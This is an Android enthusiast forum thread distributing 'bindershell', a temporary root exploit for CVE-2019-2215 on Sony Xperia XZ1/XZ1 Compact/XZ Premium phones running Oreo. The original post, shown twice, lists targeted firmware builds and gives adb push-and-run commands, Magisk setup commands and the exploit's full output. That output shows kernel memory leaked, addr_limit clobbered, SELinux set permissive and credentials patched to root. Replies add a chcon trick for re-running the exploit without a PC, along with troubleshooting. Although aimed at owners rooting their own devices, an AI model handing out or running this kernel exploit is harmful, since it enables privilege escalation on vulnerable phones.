[XZ1c/XZ1/XZp] temp root exploit via CVE-2019-2215 including magisk setup [Locked BL]

Search This thread
By:
Advanced…
N

nlra

Senior Member
Sep 5, 2012
160
85
j4nn said:
@jayloofah, unfortunately the method I am using is very dangerous, with real risk of bricking the phone, particularly those that cannot be unlocked with sony site unlock code. Also you cannot flash any custom rom as is. [...]
Click to expand...
Click to collapse

Hey @j4nn,

"Long time listener, first time caller." I appreciate your clear talents, and thank you for all that you have done for the Xperia community by applying those talents!

I also appreciate your reasons for keeping this exploit close to your chest...it's very responsible of you. Even so, these old phone platforms aren't getting any younger or more valuable as time passes -- all of the SD835-based Yoshino devices are either nearing (XZ1*) or have passed (XZP) the 4+ year mark now -- and since both Sony is very unlikely to release any further Yoshino updates at this point to close this loop, and also since subsequent Xperia platforms based on newer Qualcomm SoC have proven to be resistant to the exploit (at least without dire consequences, thus providing a ready deterrent to most random Joes who might want to try it, assuming they even have the requisite skill to attempt it, which as you pointed out would require a carefully-prepped and tested-in-advance custom kernel build from source at the very least!)

So with these devices nearing the end of their usable lifespan, it begs the question at what point would it no longer be considered irresponsible to at least document & disclose to the public exactly how the exploit works, especially since (arguably) the utility of these phone models as "out of date" products (by most -- perhaps wrong -- standards) would only increase in value as a result *if* this exploit were to escape the confines of your lab. Nobody is asking for you to implement, maintain, and support a dozen different easy-to-install versions of it for various ROMs...at least I'm not! 🙂 But I do think it would be a pity if the knowledge never got written down & disseminated, and instead just withered on the vine...

That said, if what you're primarily concerned about at this point is protecting it because you think Qualcomm SoC with TrustZone might be vulnerable to it up even to the present day, and so letting it leak out would allow Qualcomm to close it on current and future products, then that is a bit more understandable...
 
  • Like
Reactions: nitrams, eparr, KamilFKH and 2 others
G

gopal404

New member
May 28, 2016
1
0
j4nn said:
temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
by j4nn
https://j4nn.github.io/

Let me present you a temp root exploit for sony xperia XZ1 Compact / XZ1 / XZ Premium phones running android oreo firmware.
The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).

SUPPORTED TARGETS
  • XZ1 Compact
    • G8441_47.1.A.8.49 (tested myself)
    • G8441_47.1.A.16.20 (tested myself)
  • XZ1
    • G8341_47.1.A.16.20
    • G8342_47.1.A.16.20
  • XZ Premium
    • G8141_47.1.A.16.20
    • G8142_47.1.A.16.20
with bindershell-v2 following targets added:
  • Xperia XZ1
    • G8343_47.1.A.12.150 (Freedom Canada)
    • G8343_47.1.A.12.205 (Freedom Canada)
    • SO-01K_47.1.F.1.105 (Docomo Japan)
    • SOV36_47.1.C.9.106 (AU Japan)
  • Xperia XZ1 Compact
    • SO-02K_47.1.F.1.105 (Docomo Japan)
  • XZ Premium
    • SO-04J_47.1.F.1.105 (Docomo Japan)
with bindershell-v2x following target added:
  • Xperia XZ1
    • 701SO_47.1.D.11.32 (Softbank Japan)
This is an alternative method to my renoroot exploit release before, to get a temp root shell for TA (drm keys) backup .

I've also implemented a script to start up magisk from the temp root shell, so this can be used nicely with still locked phones to enable magisk root without unlocking bootloader with the latest oreo fw. You still cannot modify anything in /system or /vendor partitions due to dm-verity, but you could use it for other useful stuff, like iptables based firewall for example.

Listed firmware versions may be found for example here:
https://www.xperiasite.pl/forum/221-firmware/
https://boycracked.com/?s=xperia+xz1

USAGE HOWTO
  • to get a simple temp root shell
    just download bindershell.zip, unzip, 'adb push bindershell /data/local/tmp' and get temp root:
    Code: 
    G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ chmod 755 ./bindershell                                                                                                             
G8441:/data/local/tmp $ ./bindershell                                                                                                                       

bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffecc9691b00
MAIN: thread_info_ptr = ffffffecc4c34000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kaslr slide 0x1d35200000
selinux set to permissive
current task credentials patched

got root, start shell...

G8441:/data/local/tmp #
  • for temp root with magisk setup
    do as in previous option and download also the magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and use following commands in addition (skip starting the bindershell in previous section):
    Code: 
    adb install MagiskManager-v7.1.2.apk
adb push Magisk-v19.3 /data/local/tmp
adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk'
adb push magisk-setup.sh /data/local/tmp
adb shell chmod 755 /data/local/tmp/magisk-setup.sh
    (also present in the included magisk-push.sh script, which you can simply execute in linux or possibly rename to a .bat file and execute it in windows too /not tested though/)
    The above would copy the needed stuff to your phone.
    Then after each boot you can use following command to startup magisk via the exploit:
    Code: 
    adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'
  • see post#41 for a possibility to start this exploit again after reboot without use of adb, thanks to @Tifs


SOURCES
Source code for the exploit (bindershell) is available here:
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

Magisk startup script is obviously already in source form inside the magisk-setup-from-exploit.zip archive attached.

Magisk binaries packed in the Magisk-v19.3-Manager-v7.1.2.zip are not modified upstream released Magisk-v19.3.zip and MagiskManager-v7.1.2.apk, extracted only needed components and combined into single archive.
It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.

CREDITS
thanks to @arpruss for the su98 exploit variant (where binder_thread wait queue is at 0x98 offset instead of 0xa0, needed completely different approach than the original exploit) - the core of the exploit up to kernel space r/w primitives has been used

DOWNLOAD
Click to expand...
Click to collapse
is it work for XZ1 47.1.A.12.205?
 
skypiece

skypiece

New member
Feb 23, 2012
1
3
Moscow
skypiece.narod.ru
Thanks for all good advices above!
My job's banking applications not like permanent root (stupid securities). And I must to use unsecured Android 8 (Oreo) with many limitations and breaches (instead of secured modern OS with permanent root) because we have temp root solution.

I have updated and automated all necessary things. Bindershell v2x, official binaries Magisk v23.0 works better than v19.3 (root not lost after clearing Manager app from RAM). SafetyNet working too.
0. You need to be familiar with ADB on Windows; Connect a phone;
1. Unpack attached archive to some folder
2. Run Magisk-v23.0-push.cmd (or port simple commands to unix like) and enjoy this magic

After rebooting of your phone, at any time when root is needed, just run /sdcard/magisk-activate.sh with SManager and root will back without ADB using.

p.s. tested on XZ1 Dual G8342 47.1.A.16.20 with locked bootloader
 

Attachments

  • temp-root-Magisk-v23.0.zip
    7.6 MB · Views: 166
  • Screenshot_20220117-230727.png
    Screenshot_20220117-230727.png
    56.3 KB · Views: 41
  • Like
Reactions: Nik¹, satelliteseeker and SGH-i200
Sumomaus

Sumomaus

New member
Jan 17, 2022
2
2
Berlin
Thanks for your work j4ann!

First of all, excuse my bad english, please.

I read a lot in the xda. Especially the sony-forums.

I've got a problem with one of my g8441. The first g8441 I exploited with renoshell. Everthing is fine. The second g8441 I tried the new method with bindershell. Everthing worked until the push back the TA to the phone.

I flashed the fw G8441_47.1.A.8.49 by newsflasher, then I did a temp root shell by bindershell. Saved the TA. Unlocked the phone, did a root shell, pushed back the TA. No error messages.
Then I rebooted, but phone didn't start.
Hardreset didn't work. The notification light flashes green during that.
If I connect it to the PC, it´s going to flashmode. So I can flash the fw G8441_47.1.A.8.49 by newsflasher again. But after that, reboot isn't possible.

What did I wrong?
 
J

j4nn

Senior Member
Jan 4, 2012
1,286
2,505
@Sumomaus, I am sorry, I have no idea what might went wrong there, except that ta partition got corrupted for some reason?
But if it boots to flash mode, you may try to run newflasher in empty directory to get the phone information logged - there you may see if everything is returned valid or not.
Can it forcefully boot into fastboot mode? And then twrp boot from usb?
 
P

Pocoio

New member
Jan 29, 2022
1
0
Hi, I proceeded flawlessly, gaining root access with magisk, confirmed with a few apps, but after removing from USB cable, a few minutes later no root exists anymore. What am I'm missing? (running docomo version with your specific build number)
 
rizky_ykg

rizky_ykg

Member
Jun 1, 2022
7
2
thangks to you, put magisk on oem and no more temproot on pc again

#tested on XZ1 Softbank
*here I added Magisk on sdcard
 

Attachments

  • IMG_20220601_165411.JPG
    IMG_20220601_165411.JPG
    34.8 KB · Views: 125
  • Magisk-v23.0_oem.zip
    7.4 MB · Views: 90
  • Magisk-v23.0-on_sdcard.zip
    2.7 MB · Views: 79
Last edited:
  • Like
Reactions: j4nn
rizky_ykg

rizky_ykg

Member
Jun 1, 2022
7
2
*here magisk v25.1
-can't enable zygisk, idk how to do this on temproot
-can't hide magisk apps, like v24.xx down
-but the modules normal
 

Attachments

  • Magisk-v25.1_sdcard.zip
    3.7 MB · Views: 36
  • Screenshot_20220719-131649.png
    Screenshot_20220719-131649.png
    147.7 KB · Views: 46
  • downgrade.sh
    241 bytes · Views: 27
Last edited:
asseforlife

asseforlife

Member
May 16, 2016
42
8
skypiece said:
Thanks for all good advices above!
My job's banking applications not like permanent root (stupid securities). And I must to use unsecured Android 8 (Oreo) with many limitations and breaches (instead of secured modern OS with permanent root) because we have temp root solution.

I have updated and automated all necessary things. Bindershell v2x, official binaries Magisk v23.0 works better than v19.3 (root not lost after clearing Manager app from RAM). SafetyNet working too.
0. You need to be familiar with ADB on Windows; Connect a phone;
1. Unpack attached archive to some folder
2. Run Magisk-v23.0-push.cmd (or port simple commands to unix like) and enjoy this magic

After rebooting of your phone, at any time when root is needed, just run /sdcard/magisk-activate.sh with SManager and root will back without ADB using.

p.s. tested on XZ1 Dual G8342 47.1.A.16.20 with locked bootloader
Click to expand...
Click to collapse

EDIT: it works, but after reboot, when the script start, it say "no daemon is running"
 
Last edited:
J

j4nn

Senior Member
Jan 4, 2012
1,286
2,505
@eparr thank you for the donation!
I guess it was not necessary particularly when considering your guide post...
I see that as very useful possibly for many others - thank you!
 
Nik¹

Nik¹

Member
Dec 12, 2022
8
0
@j4nn hi,
I have sony xperia xz1 docomo SO-01K. I want to temproot but failed because the bindershell targeted version is SO-01K_47.1.F.1.105 but mine is SO-01K_47.1.B.0.542. Can anyone help me to temproot? Please help me🙏😔
 
Last edited:
J

j4nn

Senior Member
Jan 4, 2012
1,286
2,505
Anybody, can you please share me TA partition of your SO-02K (or the fake G8441 which is in fact SO-02K)?
I am on the verge of enabling LTE band 20 on my SO-02K, but I need to compare several TA partitions of that model in order to identify ta units that are device specific vs that are identical within the SO-02K model range.
 
  • Like
Reactions: asseforlife
N

nitrams

Member
May 12, 2020
41
5
j4nn said:
Anybody, can you please share me TA partition of your SO-02K (or the fake G8441 which is in fact SO-02K)?
I am on the verge of enabling LTE band 20 on my SO-02K, but I need to compare several TA partitions of that model in order to identify ta units that are device specific vs that are identical within the SO-02K model range.
Click to expand...
Click to collapse
I only have sov36 if that could help. I also hope you can help to enable volte to my xz1. The network that I'm using was just recently become operational in 2021 so i think the modem configuration (.mbn) is not present in any ROM either stock au or global. I did some research and found out that other people was able to use volte using the same network but on different phone and there are some that needs root. I have tried your temp root but knowing it's limitation im not sure if i can make it work with it. I have xperia 5 au with working volte using the same network and im thinking if its possible to port the modem config to xz1 tho I'm still in between whether it will work or not since they have different chipset. The fact that xz1 au has bl unlock no, there is no much thing to try for me. Although I've seen some post that even japan units can turn to bl unlock yes through s1 unlock tool but also need to pay for the one time use account. I've also seen some post about qpst tool to enable volte and probably update the modem config files but i think the phone needs to be rooted. My guts tells me that it is possible, i just dont know how. Or maybe I'm just wrong at all and these research of mine just gave me falls hopes lol 😂. Anyway, i would really appreciate if you look into this and im willing to participate on testings if ever. Btw, the network im using is DITO telecom, whos parent company is china telecom. We very much appreciate your work and contributions. Sending thanks from. Philippines 😊
 
You must log in or register to reply here.

Similar threads

[NUT]
[DEVDB][TWRP][PhilZ Touch] XZDualRecovery 2.8.26 RELEASE
Replies
7K
Views
2M
P
psuryatej
A
[TOOL] [UPDATE 04/09/2015] Flashtool version 0.9.19.10 - Windows / Linux / Mac
Replies
4K
Views
5M
Z
zdob
zxz0O0
giefroot - rooting tool (CVE-2014-4322)
Replies
2K
Views
762K
W
williamzerner
DooMLoRD
[Z/ZR][ROOT] DooMLoRD Easy Rooting Toolkit (v17) {perf_event exploit}[20130717]
Replies
840
Views
880K
LeoSuperMoin
LeoSuperMoin
AndroPlus
[ROOT TOOL] rootkitXperia - Root Many Xperia! [CVE-2014-3153]
Replies
139
Views
270K
T
TheDrive

Top Liked Posts

24 Hours All time
  • There are no posts matching your filters.
  • 34
    J
    j4nn
    temp root exploit for sony xperia XZ1c/XZ1/XZp with oreo firmware
    by j4nn
    https://j4nn.github.io/

    Let me present you a temp root exploit for sony xperia XZ1 Compact / XZ1 / XZ Premium phones running android oreo firmware.
    The exploit uses CVE-2019-2215, which can get you a temporal root shell very quickly and reliably (it's nearly instant).

    SUPPORTED TARGETS
    • XZ1 Compact
      • G8441_47.1.A.8.49 (tested myself)
      • G8441_47.1.A.16.20 (tested myself)
    • XZ1
      • G8341_47.1.A.16.20
      • G8342_47.1.A.16.20
    • XZ Premium
      • G8141_47.1.A.16.20
      • G8142_47.1.A.16.20
    with bindershell-v2 following targets added:
    • Xperia XZ1
      • G8343_47.1.A.12.150 (Freedom Canada)
      • G8343_47.1.A.12.205 (Freedom Canada)
      • SO-01K_47.1.F.1.105 (Docomo Japan)
      • SOV36_47.1.C.9.106 (AU Japan)
    • Xperia XZ1 Compact
      • SO-02K_47.1.F.1.105 (Docomo Japan)
    • XZ Premium
      • SO-04J_47.1.F.1.105 (Docomo Japan)
    with bindershell-v2x following target added:
    • Xperia XZ1
      • 701SO_47.1.D.11.32 (Softbank Japan)
    This is an alternative method to my renoroot exploit release before, to get a temp root shell for TA (drm keys) backup .

    I've also implemented a script to start up magisk from the temp root shell, so this can be used nicely with still locked phones to enable magisk root without unlocking bootloader with the latest oreo fw. You still cannot modify anything in /system or /vendor partitions due to dm-verity, but you could use it for other useful stuff, like iptables based firewall for example.

    Listed firmware versions may be found for example here:
    https://www.xperiasite.pl/forum/221-firmware/
    https://boycracked.com/?s=xperia+xz1

    USAGE HOWTO
    • to get a simple temp root shell
      just download bindershell.zip, unzip, 'adb push bindershell /data/local/tmp' and get temp root:
      Code: 
      G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ chmod 755 ./bindershell                                                                                                              
G8441:/data/local/tmp $ ./bindershell                                                                                                                        

bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215

MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffecc9691b00
MAIN: thread_info_ptr = ffffffecc4c34000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kaslr slide 0x1d35200000
selinux set to permissive
current task credentials patched

got root, start shell...

G8441:/data/local/tmp #
    • for temp root with magisk setup
      do as in previous option and download also the magisk-setup-from-exploit.zip and Magisk-v19.3-Manager-v7.1.2.zip, unzip both and use following commands in addition (skip starting the bindershell in previous section):
      Code: 
      adb install MagiskManager-v7.1.2.apk
adb push Magisk-v19.3 /data/local/tmp
adb shell 'cd /data/local/tmp/Magisk-v19.3 ; chmod 755 * ; /system/bin/sh ./update-binary -x ; ./magiskinit -x magisk magisk'
adb push magisk-setup.sh /data/local/tmp
adb shell chmod 755 /data/local/tmp/magisk-setup.sh
      (also present in the included magisk-push.sh script, which you can simply execute in linux or possibly rename to a .bat file and execute it in windows too /not tested though/)
      The above would copy the needed stuff to your phone.
      Then after each boot you can use following command to startup magisk via the exploit:
      Code: 
      adb shell 'cd /data/local/tmp ; ./bindershell -c ./magisk-setup.sh'
    • see post#41 for a possibility to start this exploit again after reboot without use of adb, thanks to @Tifs


    SOURCES
    Source code for the exploit (bindershell) is available here:
    https://github.com/j4nn/renoshell/tree/CVE-2019-2215

    Magisk startup script is obviously already in source form inside the magisk-setup-from-exploit.zip archive attached.

    Magisk binaries packed in the Magisk-v19.3-Manager-v7.1.2.zip are not modified upstream released Magisk-v19.3.zip and MagiskManager-v7.1.2.apk, extracted only needed components and combined into single archive.
    It might be possible to use other versions (v19.3+), but that has not been tested and is not supported in any way.

    CREDITS
    thanks to @arpruss for the su98 exploit variant (where binder_thread wait queue is at 0x98 offset instead of 0xa0, needed completely different approach than the original exploit) - the core of the exploit up to kernel space r/w primitives has been used

    DOWNLOAD
    View
    7
    T
    Tifs
    Thanks @j4nn for your effort.
    Now, all the years I've spent with stock Android 8, denying any attempt to upgrade, make sense :)
    Finally, I own the f**d phone, not the opposite.
    Even though there is no write access to /system and /vendor, it's possible to access all applications data directly, and control the system. It's not hard to apply the changes every time after reboot.

    By the way, I found that adb shell is not necessary to root the phone after reboot. It's possible to setup proper SELinux context on /data/local/tmp/bindershell from root shell:
    Code: 
    G8441:/data/local/tmp # chcon u:object_r:system_file:s0 ./bindershell
    And after that, you can reboot and launch
    Code: 
    G8441:/ $ /data/local/tmp/bindershell
...
got root, start shell
G8441:/ #
    from your favorite Terminal app inside the phone on the go, there's no need for PC and adb.
    I guess it's possible to setup Magisk that way too, or even create an app with desktop icon to automate this. So you will only need to click it once after reboot.
    View
    6
    J
    j4nn
    Actually you can remove bloatware permanently, but without gaining any storage space.
    It is possible to do that via oem partition - there you can make modifications, dm-verity does not check oem partition.
    It is possible to define which applications would be "removed", then even factory reset would not enable them again.
    This way of bloatware removal is quite tricky, as you may need to test factory reset to see if the phone boots or not.
    Such debloating can be done via early_config.xml in oem partition - there you can permanently blacklist apps with entries like this:
    Code: 
       <string-array name="config_packagesBlacklist">
      <item>com.amazon.mShop.android.shopping</item>
   </string-array>
   <string-array name="config_packagesFullBlacklist">
      <item>com.amazon.mShop.android.shopping</item>
   </string-array>
    View
    5
    J
    j4nn
    temp root for new targets available with bindershell-v2 - following targets added:
    • Xperia XZ1
      • G8343_47.1.A.12.150 (Freedom Canada)
      • G8343_47.1.A.12.205 (Freedom Canada)
      • SO-01K_47.1.F.1.105 (Docomo Japan)
      • SOV36_47.1.C.9.106 (AU Japan)
    • Xperia XZ1 Compact
      • SO-02K_47.1.F.1.105 (Docomo Japan)
    • XZ Premium
      • SO-04J_47.1.F.1.105 (Docomo Japan)
    (offsets extracted from kernels from fully downloaded firmwares)
    View
    5
    J
    j4nn
    @p@to, it's only a temp root. Once you power off / reboot, it is not rooted anymore, you would need to start the exploit again - just the last command starting magisk. Using magisk modules might work or not, it depends - magisk is used in a way here that it has not been designed in (normally it should be started from kernel's ramdisk before the original init).
    You need to unlock and restore ta backup in order to get possibilities like custom kernels or full roms, pie or whatever...
    The only permanent customizations may be done in oem partition. You could tune the blacklisted apps there in an oem version from pie firmware to prepare it for pie upgrade and then manually flash the rest of the pie fw skipping oem to keep the modded/debloated seetup in oem while running pie with still locked BL, obviously without root.
    Or stick with the exploitable fw version (latest oreo) to be able to startup magisk after each boot, if you cannot unlock your BL.
    View

New posts